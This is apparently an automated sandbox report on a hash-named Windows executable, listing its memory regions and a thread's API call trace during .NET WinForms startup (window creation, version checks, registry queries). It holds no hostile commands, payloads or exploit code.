filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll")
Region:
id = 1644
start_va = 0x4e30000
end_va = 0x4e30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004e30000"
filename = ""
Region:
id = 1645
start_va = 0x4e30000
end_va = 0x4e83fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll")
Region:
id = 1646
start_va = 0x4e90000
end_va = 0x4e9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e90000"
filename = ""
Region:
id = 1647
start_va = 0x4e90000
end_va = 0x4e94fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sorttbls.nlp"
filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")
Region:
id = 1648
start_va = 0x4ea0000
end_va = 0x4ee0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortkey.nlp"
filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")
Region:
id = 1649
start_va = 0x4ef0000
end_va = 0x4ef4fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004ef0000"
filename = ""
Region:
id = 1650
start_va = 0x4f00000
end_va = 0x4f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f00000"
filename = ""
Region:
id = 1651
start_va = 0x6aaf0000
end_va = 0x6ab7cfff
monitored = 1
entry_point = 0x6ab19060
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\diasymreader.dll")
Region:
id = 1652
start_va = 0x4f10000
end_va = 0x4f10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004f10000"
filename = ""
Region:
id = 1653
start_va = 0x4f30000
end_va = 0x4f33fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f30000"
filename = ""
Region:
id = 1654
start_va = 0x4f40000
end_va = 0x4f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f40000"
filename = ""
Region:
id = 1655
start_va = 0x4f80000
end_va = 0x507ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f80000"
filename = ""
Region:
id = 1656
start_va = 0x5090000
end_va = 0x50cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005090000"
filename = ""
Region:
id = 1657
start_va = 0x50d0000
end_va = 0x51cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000050d0000"
filename = ""
Region:
id = 1658
start_va = 0x51d0000
end_va = 0x51e8fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000051d0000"
filename = ""
Region:
id = 1659
start_va = 0x5080000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005080000"
filename = ""
Region:
id = 1660
start_va = 0x51f0000
end_va = 0x52effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051f0000"
filename = ""
Region:
id = 1661
start_va = 0x52f0000
end_va = 0x52fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000052f0000"
filename = ""
Region:
id = 1806
start_va = 0x5080000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005080000"
filename = ""
Region:
id = 1807
start_va = 0x5080000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005080000"
filename = ""
Region:
id = 1808
start_va = 0x52f0000
end_va = 0x532ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000052f0000"
filename = ""
Region:
id = 1809
start_va = 0x5330000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005330000"
filename = ""
Region:
id = 1810
start_va = 0x5430000
end_va = 0x546ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005430000"
filename = ""
Region:
id = 1811
start_va = 0x5470000
end_va = 0x556ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005470000"
filename = ""
Region:
id = 1812
start_va = 0x74a30000
end_va = 0x74a35fff
monitored = 0
entry_point = 0x74a31460
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 1813
start_va = 0x5080000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005080000"
filename = ""
Region:
id = 1814
start_va = 0x5570000
end_va = 0x55affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005570000"
filename = ""
Region:
id = 1815
start_va = 0x55b0000
end_va = 0x56affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000055b0000"
filename = ""
Region:
id = 1816
start_va = 0x56b0000
end_va = 0x57affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000056b0000"
filename = ""
Region:
id = 1817
start_va = 0x57b0000
end_va = 0x57effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000057b0000"
filename = ""
Region:
id = 1818
start_va = 0x57f0000
end_va = 0x58effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000057f0000"
filename = ""
Region:
id = 1819
start_va = 0x5080000
end_va = 0x5082fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005080000"
filename = ""
Region:
id = 1820
start_va = 0x75e90000
end_va = 0x75eeefff
monitored = 0
entry_point = 0x75e94af0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 1821
start_va = 0x71a70000
end_va = 0x71abefff
monitored = 0
entry_point = 0x71a7d850
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 1822
start_va = 0x64890000
end_va = 0x648fbfff
monitored = 0
entry_point = 0x648ecd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 1823
start_va = 0x58f0000
end_va = 0x595bfff
monitored = 0
entry_point = 0x594cd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 1824
start_va = 0x5960000
end_va = 0x596ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005960000"
filename = ""
Region:
id = 1825
start_va = 0x5970000
end_va = 0x5a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005970000"
filename = ""
Region:
id = 1826
start_va = 0x5a70000
end_va = 0x5a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a70000"
filename = ""
Region:
id = 1827
start_va = 0x64890000
end_va = 0x648fbfff
monitored = 0
entry_point = 0x648ecd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 1828
start_va = 0x5a80000
end_va = 0x5a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a80000"
filename = ""
Region:
id = 1829
start_va = 0x637a0000
end_va = 0x63999fff
monitored = 0
entry_point = 0x639782be
region_type = mapped_file
name = "system.xml.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.XML.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.xml\\2.0.0.0__b77a5c561934e089\\system.xml.dll")
Region:
id = 1830
start_va = 0x5a90000
end_va = 0x5c89fff
monitored = 0
entry_point = 0x5c682be
region_type = mapped_file
name = "system.xml.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.XML.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.xml\\2.0.0.0__b77a5c561934e089\\system.xml.dll")
Region:
id = 1831
start_va = 0x5c90000
end_va = 0x5caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005c90000"
filename = ""
Region:
id = 1832
start_va = 0x637a0000
end_va = 0x63999fff
monitored = 0
entry_point = 0x639782be
region_type = mapped_file
name = "system.xml.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.XML.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.xml\\2.0.0.0__b77a5c561934e089\\system.xml.dll")
Region:
id = 1833
start_va = 0x5cb0000
end_va = 0x5cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cb0000"
filename = ""
Region:
id = 1834
start_va = 0x5cb0000
end_va = 0x5cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cb0000"
filename = ""
Region:
id = 1835
start_va = 0x5cc0000
end_va = 0x5ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cc0000"
filename = ""
Region:
id = 1836
start_va = 0x5cd0000
end_va = 0x5cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cd0000"
filename = ""
Region:
id = 1837
start_va = 0x5ce0000
end_va = 0x5ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ce0000"
filename = ""
Region:
id = 1838
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1839
start_va = 0x5d10000
end_va = 0x5d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d10000"
filename = ""
Region:
id = 1840
start_va = 0x5cb0000
end_va = 0x5cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cb0000"
filename = ""
Region:
id = 1841
start_va = 0x5cc0000
end_va = 0x5ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cc0000"
filename = ""
Region:
id = 1842
start_va = 0x5cd0000
end_va = 0x5cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cd0000"
filename = ""
Region:
id = 1843
start_va = 0x5cd0000
end_va = 0x5ceffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005cd0000"
filename = ""
Region:
id = 1844
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1845
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1846
start_va = 0x719a0000
end_va = 0x71a23fff
monitored = 0
entry_point = 0x719c6530
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")
Region:
id = 1847
start_va = 0x74610000
end_va = 0x74616fff
monitored = 0
entry_point = 0x74611e10
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 1848
start_va = 0x71970000
end_va = 0x7199efff
monitored = 0
entry_point = 0x7197bb70
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")
Region:
id = 1849
start_va = 0x5d20000
end_va = 0x5d5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d20000"
filename = ""
Region:
id = 1850
start_va = 0x5d60000
end_va = 0x5e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d60000"
filename = ""
Region:
id = 1851
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1852
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1853
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1854
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1855
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1856
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1857
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1858
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1859
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1860
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1861
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1862
start_va = 0x5d00000
end_va = 0x5d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d00000"
filename = ""
Region:
id = 1863
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1864
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1865
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1866
start_va = 0x5d00000
end_va = 0x5d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d00000"
filename = ""
Region:
id = 1867
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1868
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1869
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1870
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1871
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1872
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1873
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1874
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1875
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1876
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1877
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1878
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1879
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1880
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1881
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1882
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1883
start_va = 0x5d00000
end_va = 0x5d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005d00000"
filename = ""
Region:
id = 1884
start_va = 0x5cf0000
end_va = 0x5cf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005cf0000"
filename = ""
Region:
id = 1885
start_va = 0x5e60000
end_va = 0x5edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e60000"
filename = ""
Region:
id = 1886
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1887
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 1889
start_va = 0x5cf0000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Thread:
id = 105
os_tid = 0xce0
[0197.765] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0197.933] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0197.933] GetLastError () returned 0x2
[0197.941] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0197.941] GetLastError () returned 0x2
[0197.945] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0197.945] GetLastError () returned 0x2
[0197.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0197.952] GetLastError () returned 0x2
[0197.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0197.952] GetLastError () returned 0x2
[0197.960] GetVersionExW (in: lpVersionInformation=0x606e60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x606e60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0197.960] GetLastError () returned 0x2
[0197.961] GetVersionExW (in: lpVersionInformation=0x606e60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x606e60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0197.961] GetLastError () returned 0x2
[0199.021] _finite (_X=0x0) returned 1
[0199.349] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1ae
[0199.349] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1af
[0199.638] GetSystemMetrics (nIndex=75) returned 1
[0199.943] AdjustWindowRectEx (in: lpRect=0x19ee9c, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19ee9c) returned 1
[0199.978] GetCurrentProcess () returned 0xffffffff
[0199.979] GetCurrentThread () returned 0xfffffffe
[0199.979] GetCurrentProcess () returned 0xffffffff
[0199.983] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19edcc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19edcc*=0x270) returned 1
[0199.983] GetLastError () returned 0x2
[0200.029] GetCurrentThreadId () returned 0xce0
[0200.219] lstrlenW (lpString="䅁") returned 1
[0200.309] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76300000
[0200.312] GetProcAddress (hModule=0x76300000, lpProcName="DefWindowProcW") returned 0x772eaee0
[0200.317] GetStockObject (i=5) returned 0x1900015
[0200.317] GetLastError () returned 0x2
[0200.350] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.352] CoTaskMemAlloc (cb=0x4c) returned 0x5f2570
[0200.352] RegisterClassW (lpWndClass=0x673948) returned 0xc1de
[0200.353] GetLastError () returned 0x2
[0200.353] CoTaskMemFree (pv=0x5f2570)
[0200.353] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.372] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x9027e
[0200.383] SetWindowLongW (hWnd=0x9027e, nIndex=-4, dwNewLong=1999548128) returned 33687698
[0200.402] GetWindowLongW (hWnd=0x9027e, nIndex=-4) returned 1999548128
[0200.411] lstrlenW (lpString="䅁") returned 1
[0200.413] GetVersionExW (in: lpVersionInformation=0x673968*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x673968*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0200.413] GetLastError () returned 0x2
[0200.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e41c | out: phkResult=0x19e41c*=0x274) returned 0x0
[0200.419] RegQueryValueExW (in: hKey=0x274, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19e464, lpData=0x0, lpcbData=0x19e460*=0x0 | out: lpType=0x19e464*=0x0, lpData=0x0, lpcbData=0x19e460*=0x0) returned 0x2
[0200.419] RegQueryValueExW (in: hKey=0x274, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19e464, lpData=0x0, lpcbData=0x19e460*=0x0 | out: lpType=0x19e464*=0x0, lpData=0x0, lpcbData=0x19e460*=0x0) returned 0x2
[0200.420] RegCloseKey (hKey=0x274) returned 0x0
[0200.446] SetWindowLongW (hWnd=0x9027e, nIndex=-4, dwNewLong=33688018) returned 1999548128
[0200.446] GetWindowLongW (hWnd=0x9027e, nIndex=-4) returned 33688018
[0200.446] GetWindowLongW (hWnd=0x9027e, nIndex=-16) returned 113311744
[0200.582] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1dd
[0200.595] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x9027e, Msg=0x24, wParam=0x0, lParam=0x19e734) returned 0x0
[0200.597] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1d9
[0200.598] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x9027e, Msg=0x81, wParam=0x0, lParam=0x19e728) returned 0x1
[0200.599] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x9027e, Msg=0x83, wParam=0x0, lParam=0x19e714) returned 0x0
[0200.607] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x9027e, Msg=0x1, wParam=0x0, lParam=0x19e728) returned 0x0
[0200.614] GetClientRect (in: hWnd=0x9027e, lpRect=0x19e470 | out: lpRect=0x19e470) returned 1
[0200.617] GetWindowRect (in: hWnd=0x9027e, lpRect=0x19e470 | out: lpRect=0x19e470) returned 1
[0200.752] GetLastError () returned 0x6
[0200.757] GetParent (hWnd=0x9027e) returned 0x0
[0200.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x19e99c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x64
[0200.772] GetLastError () returned 0x6
[0200.777] IsAppThemed () returned 0x1
[0200.779] CoTaskMemAlloc (cb=0xca) returned 0x66f7e8
[0200.779] CreateActCtxA (pActCtx=0x673930) returned 0x67aefc
[0200.794] CoTaskMemFree (pv=0x66f7e8)
[0200.834] GetCurrentActCtx (in: lphActCtx=0x19f3a4 | out: lphActCtx=0x19f3a4*=0x0) returned 1
[0200.835] ActivateActCtx (in: hActCtx=0x67aefc, lpCookie=0x19f3b0 | out: hActCtx=0x67aefc, lpCookie=0x19f3b0) returned 1
[0200.861] GetCurrentActCtx (in: lphActCtx=0x19f1ec | out: lphActCtx=0x19f1ec*=0x67aefc) returned 1
[0200.868] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0200.868] CreateWindowExW (dwExStyle=0x10000, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName=0x0, dwStyle=0x22cf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=300, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x4024a
[0200.873] SetWindowLongW (hWnd=0x4024a, nIndex=-4, dwNewLong=1999548128) returned 33687698
[0200.874] GetWindowLongW (hWnd=0x4024a, nIndex=-4) returned 1999548128
[0200.875] SetWindowLongW (hWnd=0x4024a, nIndex=-4, dwNewLong=33688066) returned 1999548128
[0200.875] GetWindowLongW (hWnd=0x4024a, nIndex=-4) returned 33688066
[0200.875] GetWindowLongW (hWnd=0x4024a, nIndex=-16) returned 651100160
[0200.886] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x81, wParam=0x0, lParam=0x19ebe0) returned 0x1
[0200.894] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x83, wParam=0x0, lParam=0x19ebcc) returned 0x0
